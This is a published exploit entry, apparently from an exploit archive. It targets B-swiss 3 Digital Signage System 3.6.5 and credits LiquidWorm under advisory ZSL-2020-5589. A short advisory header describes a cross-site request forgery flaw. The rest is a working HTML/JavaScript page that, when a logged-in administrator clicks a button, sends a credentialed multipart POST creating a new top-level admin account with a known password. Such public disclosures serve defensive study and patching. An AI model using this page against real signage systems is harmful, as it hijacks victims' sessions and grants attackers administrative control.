207 lines
No EOL
7.6 KiB
Text
207 lines
No EOL
7.6 KiB
Text
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
|
|
# Date: 2020-09-16
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.b-swiss.com
|
|
# Version: 3.6.5
|
|
Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
|
|
|
|
<!--
|
|
|
|
B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
|
|
|
|
|
|
Vendor: B-Swiss SARL | b-tween Sarl
|
|
Product web page: https://www.b-swiss.com
|
|
Affected version: 3.6.5
|
|
3.6.2
|
|
3.6.1
|
|
3.6.0
|
|
3.5.80
|
|
3.5.40
|
|
3.5.20
|
|
3.5.00
|
|
3.2.00
|
|
3.1.00
|
|
|
|
Summary: Intelligent digital signage made easy. To go beyond the
|
|
possibilities offered, b-swiss allows you to create the communication
|
|
solution for your specific needs and your graphic charter. You benefit
|
|
from our experience and know-how in the realization of your digital
|
|
signage project.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: Linux 5.3.0-46-generic x86_64
|
|
Linux 4.15.0-20-generic x86_64
|
|
Linux 4.9.78-xxxx-std-ipv6-64
|
|
Linux 4.7.0-040700-generic x86_64
|
|
Linux 4.2.0-27-generic x86_64
|
|
Linux 3.19.0-47-generic x86_64
|
|
Linux 2.6.32-5-amd64 x86_64
|
|
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
|
|
macOS 10.13.5
|
|
Microsoft Windows 7 Business Edition SP1 i586
|
|
Apache/2.4.29 (Ubuntu)
|
|
Apache/2.4.18 (Ubuntu)
|
|
Apache/2.4.7 (Ubuntu)
|
|
Apache/2.2.22 (Win64)
|
|
Apache/2.4.18 (Ubuntu)
|
|
Apache/2.2.16 (Debian)
|
|
PHP/7.2.24-0ubuntu0.18.04.6
|
|
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
|
|
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
|
|
PHP/5.6.31
|
|
PHP/5.6.30-10+deb.sury.org~xenial+2
|
|
PHP/5.5.9-1ubuntu4.17
|
|
PHP/5.5.9-1ubuntu4.14
|
|
PHP/5.3.10
|
|
PHP/5.3.13
|
|
PHP/5.3.3-7+squeeze16
|
|
PHP/5.3.3-7+squeeze17
|
|
MySQL/5.5.49
|
|
MySQL/5.5.47
|
|
MySQL/5.5.40
|
|
MySQL/5.5.30
|
|
MySQL/5.1.66
|
|
MySQL/5.1.49
|
|
MySQL/5.0.77
|
|
MySQL/5.0.12-dev
|
|
MySQL/5.0.11-dev
|
|
MySQL/5.0.8-dev
|
|
phpMyAdmin/3.5.7
|
|
phpMyAdmin/3.4.10.1deb1
|
|
phpMyAdmin/3.4.7
|
|
phpMyAdmin/3.3.7deb7
|
|
WampServer 3.2.0
|
|
Acore Framework 2.0
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2020-5589
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
|
|
|
|
|
|
13.06.2020
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<h1>CSRF Add b-swiss Maintenance Admin</h1>
|
|
<script>
|
|
function GodMode()
|
|
{
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
|
|
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
|
|
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
|
|
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
|
|
xhr.withCredentials = true;
|
|
var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"locator\"\r\n" +
|
|
"\r\n" +
|
|
"Users.Save\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"page\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"sort\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"id\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"inpopup\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rowid\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
|
|
"\r\n" +
|
|
"TestingusF\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
|
|
"\r\n" +
|
|
"TestingusL\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_email\"\r\n" +
|
|
"\r\n" +
|
|
"aa@bb.cc\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_username\"\r\n" +
|
|
"\r\n" +
|
|
"testingus\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_password\"\r\n" +
|
|
"\r\n" +
|
|
"123456\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
|
|
"\r\n" +
|
|
"123456\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
|
|
"\r\n" +
|
|
"100000\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_status\"\r\n" +
|
|
"\r\n" +
|
|
"1\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
|
|
"Content-Type: application/octet-stream\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_language\"\r\n" +
|
|
"\r\n" +
|
|
"french-sw\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
|
|
"\r\n" +
|
|
"2\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
|
|
"Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
|
|
"\r\n" +
|
|
"1\r\n" +
|
|
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
|
|
var aBody = new Uint8Array(body.length);
|
|
for (var i = 0; i < aBody.length; i++)
|
|
aBody[i] = body.charCodeAt(i);
|
|
xhr.send(new Blob([aBody]));
|
|
}
|
|
</script>
|
|
<form action="#">
|
|
<input type="button" value="Press me" onclick="GodMode();" />
|
|
</form>
|
|
</body>
|
|
</html> |